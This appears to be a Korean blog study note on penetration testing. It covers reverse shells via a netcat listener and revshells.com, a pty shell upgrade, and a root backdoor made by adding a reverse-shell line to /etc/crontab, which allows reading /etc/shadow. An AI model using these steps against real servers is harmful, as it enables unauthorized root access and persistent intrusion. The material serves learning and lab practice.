1. 작업 환경 

    - VirtualBox

    - kali_linux

 

2. 리버스 쉘 획득 

    - 통상 서버는 방화벽에서 인바운드 규칙은 잘 설정하지만, 아웃바운드 규칙은 변수가 많이 때문에 잘 설정하지 않는다. 

      그래서 해커들을 보통 리버스 쉘을 사용함

    - 공격자 컴퓨터 포트 여는 명령 : nc -nlvp [열고자 하는 포드 번호]

    - 리버스 쉘 실행을 위한 명령어 작성해주는 곳에서 명령어를 획득하여 피해자 서버의 cmd창에서 실행 

       * 피해자 서버의 원격 코드 실행이 가능하다는 전제임

       * 리버스 쉘 관련 홈페이지 : 구글링 또는 www.revshells.com (예: 리눅스, nc mkfifo)

 

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

www.revshells.com

 

3. POST - Exploit

    □ 권한 상승

       - 운영체제 마다 다르지만 특정 운영체제에 대한 권한 상승 (privilege escalation) 구글링으로 권한 상승 정보 얻기

       - 예를 들어 리눅스의 경우 DB 관련 자료 찾기, 관련 자료에서 아이디 및 비밀번호 힌트 얻기, su root 명령어 사용시

         터미널에서 실행하라는 말이 나오면  [python -c "import pty;pty.spawn('/bin/bash')"] 명령어 사용 

    Back Door 설치 : 나중에 다시 피해 서버에 원할때 바로 들어갈 수 있도록 하는 방법

       - 리버스쉘 실행 명령어를 cron에 설정 

          * 1분마다 루트 권한으로 리버스쉘 실행 :  echo "* * * * * root [리버스쉘 명령어]" >> /etc/crontab

       - 피해자 서버에 들어가고 싶을때 설정되어 있는 공격자 컴퓨터 포트를 열면 1분 뒤에 루트 권한으로 피해자 컴퓨터

         원격 제어 가능    * 예 : nc -nlvp 9999 

    무적 상태가 됨, 루트 권한만 볼 수 있는 /etc/shadow 파일도 볼 수 있고 모든 행위가 가능해짐

'모의해킹' 카테고리의 다른 글

Burp Suite Response 환경 설정  (0) 2025.01.16
드림핵 CTF 워게임 문제 풀이 : JSFull (최초 풀이 도전)  (0) 2024.10.28
Exploit  (0) 2024.10.20
취약점 찾는법  (0) 2024.10.20
정보 수집 (NMAP 포트 스캔)  (1) 2024.10.20

+ Recent posts

# 드래그 금지